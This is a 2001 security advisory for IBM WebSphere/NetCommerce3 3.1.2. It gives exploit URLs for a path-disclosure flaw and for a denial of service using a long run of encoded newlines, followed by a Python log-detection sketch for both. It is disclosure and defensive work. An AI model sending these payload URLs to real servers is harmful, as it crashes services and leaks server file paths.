From: ET LoWNOISE (etCYBERSPACE.ORG)
Date: Thu Apr 12 2001 - 23:28:48 CDT

    PRODUCT: IBM Websphere/NetCommerce3
    VERSION: 3.1.2, possibly others (Unix and NT)

    +PATH REVEALING PROBLEM
    Exploit:

    http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK

    Result:

    DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK
     in file /usr/NetCommerce3/macros/en_US/macro.d2w

    +DoS with Long URL
    Exploit:

    http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(approx 1000)..%0a

    On UNIX and NT, NetCommerce will crash:
      Server Not Responding

    [-----------------------------------------------------------------------]

    Efrain 'ET' Torres
    etcyberspace.org
    [LoWNOISE] Colombia 2001
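
A detection sketch for the two behaviours reported above, added here as an example and not part of the original post: it flags access-log entries that hit the ExecMacro path with a long run of encoded newlines, and extracts the file path leaked by a DTWP029E error page. The log format (Apache common/combined), the threshold of 100, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Request line and status inside a common/combined-format log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
MACRO_PREFIX = "/cgi-bin/ncommerce3/ExecMacro/"
# Net.Data error quoted in the post; the token after "in file" is the leaked path.
LEAK_RE = re.compile(r"DTWP029E: .*?in file\s+(\S+)", re.S)
NEWLINE_THRESHOLD = 100  # assumed tuning value, well below the ~1000 in the post


def classify_request(log_line):
    """Return 'encoded-newline-flood', 'macro-request', or None for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    path = urlsplit(m.group(1)).path  # percent-escapes are left encoded
    if not path.startswith(MACRO_PREFIX):
        return None
    if len(re.findall(r"%0a", path, re.I)) >= NEWLINE_THRESHOLD:
        return "encoded-newline-flood"
    return "macro-request"


def leaked_path(response_body):
    """Return the server-side file path exposed by a DTWP029E page, if any."""
    m = LEAK_RE.search(response_body)
    return m.group(1) if m else None


# Constructed sample data (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/ncommerce3/'
    'ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK HTTP/1.0" 200 160',
    '192.0.2.11 - - [01/Jan/2001:10:00:05 +0000] "GET /cgi-bin/ncommerce3/'
    'ExecMacro/macro.d2w/' + "%0a" * 1000 + ' HTTP/1.0" 500 0',
    '192.0.2.12 - - [01/Jan/2001:10:00:09 +0000] "GET /index.html HTTP/1.0" 200 1043',
]
SAMPLE_BODY = ("DTWP029E: Net.Data is unable to locate the HTML block "
               "NOEXISTINGHTMLBLOCK\n in file /usr/NetCommerce3/macros/en_US/macro.d2w")

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify_request(line))
    print(leaked_path(SAMPLE_BODY))
```

The path-disclosure request is indistinguishable from an ordinary macro request in the access log, so that case is caught from the response body rather than the URL.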